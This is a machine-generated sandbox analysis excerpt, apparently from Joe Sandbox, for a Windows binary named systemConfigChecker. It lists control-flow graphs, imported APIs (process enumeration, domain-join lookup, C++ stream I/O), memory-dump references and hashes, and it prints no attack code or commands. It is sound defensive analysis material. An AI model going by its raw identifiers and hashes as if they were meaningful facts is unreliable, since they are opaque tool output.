              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
              • String ID:
              • API String ID: 3444793848-0
              • Opcode ID: 42b6029e3a9adb14015d90267ca1e11476e9fbeef03a5cae2e6db4e706ef6174
              • Instruction ID: 5b62ab608f87721ed41f3fcd22304b601650a1772d897055cabbc8b3c5dacf2d
              • Opcode Fuzzy Hash: 42b6029e3a9adb14015d90267ca1e11476e9fbeef03a5cae2e6db4e706ef6174
              • Instruction Fuzzy Hash: 2F716B72A5CB8586FB20EB65D4802AD6361FB95B84F504132EE8D93F58DF3CE585CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1197 7ff64e139c10-7ff64e139c3f 1198 7ff64e139c40-7ff64e139c48 1197->1198 1198->1198 1199 7ff64e139c4a-7ff64e139c59 1198->1199 1200 7ff64e139c5b-7ff64e139c5e 1199->1200 1201 7ff64e139c65 1199->1201 1200->1201 1203 7ff64e139c60-7ff64e139c63 1200->1203 1202 7ff64e139c67-7ff64e139c77 1201->1202 1204 7ff64e139c79-7ff64e139c7f 1202->1204 1205 7ff64e139c80-7ff64e139c92 ?good@ios_base@std@@QEBA_NXZ 1202->1205 1203->1202 1204->1205 1206 7ff64e139cc4-7ff64e139cca 1205->1206 1207 7ff64e139c94-7ff64e139ca3 1205->1207 1211 7ff64e139cd6-7ff64e139cef 1206->1211 1212 7ff64e139ccc-7ff64e139cd1 1206->1212 1209 7ff64e139ca5-7ff64e139ca8 1207->1209 1210 7ff64e139cc2 1207->1210 1209->1210 1213 7ff64e139caa-7ff64e139cc0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1209->1213 1210->1206 1215 7ff64e139cf1-7ff64e139cf4 1211->1215 1216 7ff64e139d1f-7ff64e139d3a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1211->1216 1214 7ff64e139d8e-7ff64e139dac ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1212->1214 1213->1206 1217 7ff64e139db8-7ff64e139dc8 1214->1217 1218 7ff64e139dae-7ff64e139db7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1214->1218 1215->1216 1221 7ff64e139cf6-7ff64e139d11 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1215->1221 1219 7ff64e139d67 1216->1219 1220 7ff64e139d3c 1216->1220 1223 7ff64e139dca-7ff64e139dd0 1217->1223 1224 7ff64e139dd1-7ff64e139deb 1217->1224 1218->1217 1225 7ff64e139d6a 1219->1225 1222 7ff64e139d40-7ff64e139d43 1220->1222 1226 7ff64e139d1a-7ff64e139d1d 1221->1226 1227 7ff64e139d13-7ff64e139d18 1221->1227 1228 7ff64e139d6e-7ff64e139d7e 1222->1228 1229 7ff64e139d45-7ff64e139d60 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1222->1229 1223->1224 1225->1228 1226->1215 1227->1225 1228->1214 1229->1219 1230 7ff64e139d62-7ff64e139d65 1229->1230 1230->1222
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E139C8A
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E139CAA
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E139CBA
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF64E139D07
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF64E139D31
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF64E139D56
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF64E139D9D
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF64E139DA4
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF64E139DB1
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
              • Instruction ID: b480005357eb4f9df408bc44ade1693b367a96a7fb2b32f19b064c571fd27adb
              • Opcode Fuzzy Hash: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
              • Instruction Fuzzy Hash: 5F513E3264CB4181FB21BF1AE590239A7A0FBA4F95B55C531EE4E87FA5CF39D4468B00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1232 7ff64e1399f0-7ff64e139a19 1233 7ff64e139a20-7ff64e139a27 1232->1233 1233->1233 1234 7ff64e139a29-7ff64e139a38 1233->1234 1235 7ff64e139a3a-7ff64e139a3d 1234->1235 1236 7ff64e139a44 1234->1236 1235->1236 1237 7ff64e139a3f-7ff64e139a42 1235->1237 1238 7ff64e139a46-7ff64e139a56 1236->1238 1237->1238 1239 7ff64e139a58-7ff64e139a5e 1238->1239 1240 7ff64e139a5f-7ff64e139a71 ?good@ios_base@std@@QEBA_NXZ 1238->1240 1239->1240 1241 7ff64e139aa3-7ff64e139aa9 1240->1241 1242 7ff64e139a73-7ff64e139a82 1240->1242 1246 7ff64e139aab-7ff64e139ab0 1241->1246 1247 7ff64e139ab5-7ff64e139ac8 1241->1247 1244 7ff64e139aa1 1242->1244 1245 7ff64e139a84-7ff64e139a87 1242->1245 1244->1241 1245->1244 1248 7ff64e139a89-7ff64e139a9f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1245->1248 1249 7ff64e139b6d-7ff64e139b8b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1246->1249 1250 7ff64e139afd-7ff64e139b18 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1247->1250 1251 7ff64e139aca 1247->1251 1248->1241 1252 7ff64e139b97-7ff64e139ba7 1249->1252 1253 7ff64e139b8d-7ff64e139b96 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1249->1253 1255 7ff64e139b46 1250->1255 1256 7ff64e139b1a 1250->1256 1254 7ff64e139ad0-7ff64e139ad3 1251->1254 1259 7ff64e139ba9-7ff64e139baf 1252->1259 1260 7ff64e139bb0-7ff64e139bc4 1252->1260 1253->1252 1254->1250 1261 7ff64e139ad5-7ff64e139aef ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1254->1261 1258 7ff64e139b49 1255->1258 1257 7ff64e139b20-7ff64e139b23 1256->1257 1262 7ff64e139b4d-7ff64e139b5d 1257->1262 1263 7ff64e139b25-7ff64e139b3f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1257->1263 1258->1262 1259->1260 1264 7ff64e139af8-7ff64e139afb 1261->1264 1265 7ff64e139af1-7ff64e139af6 1261->1265 1262->1249 1263->1255 1266 7ff64e139b41-7ff64e139b44 1263->1266 1264->1254 1265->1258 1266->1257
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139AE6
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B0F
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B36
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
              • Instruction ID: 8d7ccc0d8896eaf0e31fd1144991cbc06b9742d9e03c2cd8e2a34899147298d3
              • Opcode Fuzzy Hash: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
              • Instruction Fuzzy Hash: 3C510E3264CA4182FB20BB19E5D0639A7A0FB95F95B15C631EE5E83FA5CF39D4468B00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1268 7ff64e13b080-7ff64e13b0ba 1269 7ff64e13b0c6 1268->1269 1270 7ff64e13b0bc-7ff64e13b0bf 1268->1270 1272 7ff64e13b0c8-7ff64e13b0d8 1269->1272 1270->1269 1271 7ff64e13b0c1-7ff64e13b0c4 1270->1271 1271->1272 1273 7ff64e13b0da-7ff64e13b0e0 1272->1273 1274 7ff64e13b0e1-7ff64e13b0f3 ?good@ios_base@std@@QEBA_NXZ 1272->1274 1273->1274 1275 7ff64e13b125-7ff64e13b12b 1274->1275 1276 7ff64e13b0f5-7ff64e13b104 1274->1276 1280 7ff64e13b137-7ff64e13b150 1275->1280 1281 7ff64e13b12d-7ff64e13b132 1275->1281 1278 7ff64e13b106-7ff64e13b109 1276->1278 1279 7ff64e13b123 1276->1279 1278->1279 1284 7ff64e13b10b-7ff64e13b121 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1278->1284 1279->1275 1282 7ff64e13b184-7ff64e13b19f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1280->1282 1283 7ff64e13b152-7ff64e13b155 1280->1283 1285 7ff64e13b1ef-7ff64e13b20d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1281->1285 1287 7ff64e13b1c8-7ff64e13b1cb 1282->1287 1288 7ff64e13b1a1-7ff64e13b1a4 1282->1288 1283->1282 1286 7ff64e13b157-7ff64e13b172 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1283->1286 1284->1275 1289 7ff64e13b219-7ff64e13b228 1285->1289 1290 7ff64e13b20f-7ff64e13b218 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1285->1290 1291 7ff64e13b17f-7ff64e13b182 1286->1291 1292 7ff64e13b174-7ff64e13b17d 1286->1292 1294 7ff64e13b1cf-7ff64e13b1df 1287->1294 1293 7ff64e13b1a6-7ff64e13b1c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1288->1293 1288->1294 1295 7ff64e13b22a-7ff64e13b230 1289->1295 1296 7ff64e13b231-7ff64e13b24b 1289->1296 1290->1289 1291->1283 1292->1288 1293->1287 1297 7ff64e13b1c3-7ff64e13b1c6 1293->1297 1294->1285 1295->1296 1297->1288
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B0EB
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B10B
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B11B
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B168
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B196
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B1B7
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B1FE
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B205
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF64E131AD2), ref: 00007FF64E13B212
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
              • Instruction ID: 701eae4ba83c01e872216cc0902ee2bd055d1100a3b160133c4ed3cf01bac679
              • Opcode Fuzzy Hash: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
              • Instruction Fuzzy Hash: 2851F13264CB4181FB60AF19E5D4A39A7A0FF94F85B158431DE4E87B65DF3DD8468B00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
              • String ID:
              • API String ID: 1133592946-0
              • Opcode ID: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
              • Instruction ID: 939e5ab4b048dacec5b1fa898ec59af7bf40256add76b9a23ce6058ad3b2b1cd
              • Opcode Fuzzy Hash: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
              • Instruction Fuzzy Hash: 8A316D21E8D64381FA10FB659455BB96291AFA0784F445435F64EC7AD3EE2CEC048F10
              APIs
              • memset.VCRUNTIME140 ref: 00007FF64E133FAC
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • NetGetJoinInformation.NETAPI32 ref: 00007FF64E133FC8
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E134071
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E134143
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E13414D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationJoinV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
              • String ID: Domain:
              • API String ID: 3601429228-3214134553
              • Opcode ID: 8d4b799c5bb6a4fde6591288e69ee8a8858c5080ad32a675834f94ebbbcdb414
              • Instruction ID: e0dc318cfcf5083289f7ebc09e7dd4815e53ffb152883e900da60db32fd8cf95
              • Opcode Fuzzy Hash: 8d4b799c5bb6a4fde6591288e69ee8a8858c5080ad32a675834f94ebbbcdb414
              • Instruction Fuzzy Hash: 2A519C72B5CB8581FB20EBA5E4402AD6361FBA8B94F404132EA4D93A99DF3CD585CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
              • String ID:
              • API String ID: 762505753-0
              • Opcode ID: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
              • Instruction ID: aa5453edac22d021462158761358e604f8399e7084f4e88ce0a0c695b0aae100
              • Opcode Fuzzy Hash: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
              • Instruction Fuzzy Hash: 6D311E36A4CB4585FA14BF11E44416D7760FBA8B94F480632FA9E87BA9DF3CE455CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
              • String ID:
              • API String ID: 3292048638-0
              • Opcode ID: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
              • Instruction ID: a48dc42c70a567dbef0f03a804d61636bf6e2e1a8139ed8642495116d260e591
              • Opcode Fuzzy Hash: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
              • Instruction Fuzzy Hash: 7F412C75E4DB4281F600BB11E89027873A5FFA8F88F544136E94E83B61DF3CA455CB40
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
              • Instruction ID: 83bfe33cf5b8b1a1634f05833249851f80e7aef1a419eb2a47628e2d39cc47a4
              • Opcode Fuzzy Hash: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
              • Instruction Fuzzy Hash: 67316032749B8286FA65EF25E4043B9A750FB54BD4F484836DF4D87B60DE3CE49A8700
              APIs
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13B538
                • Part of subcall function 00007FF64E13BCA4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64E13BCAD
                • Part of subcall function 00007FF64E13BCA4: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF64E13B53D,?,?,?,00007FF64E13107B), ref: 00007FF64E13BCBE
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13B53E
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
              • String ID:
              • API String ID: 594857686-0
              • Opcode ID: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
              • Instruction ID: 15586140243765adc2af2b00ae7209a42e152ffa112bcfe5754481821dc758f7
              • Opcode Fuzzy Hash: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
              • Instruction Fuzzy Hash: 39E0B680ECE24B52FE68737124169B501400F753B0E1C1B30F97E86AC2BD1CA8554D20
              APIs
              • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF64E139E05
              • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF64E139E11
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E139E1A
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
              • String ID:
              • API String ID: 2094784882-0
              • Opcode ID: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
              • Instruction ID: 14fcaab3a75f7d9b8010736e5bed9ff5aa321bd82a5be63eb4f27d35e913cc70
              • Opcode Fuzzy Hash: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
              • Instruction Fuzzy Hash: 01D01734AC8B0682FA08BF26B8941781720AFA9F56B48A030ED0F87311CE3CD0958600
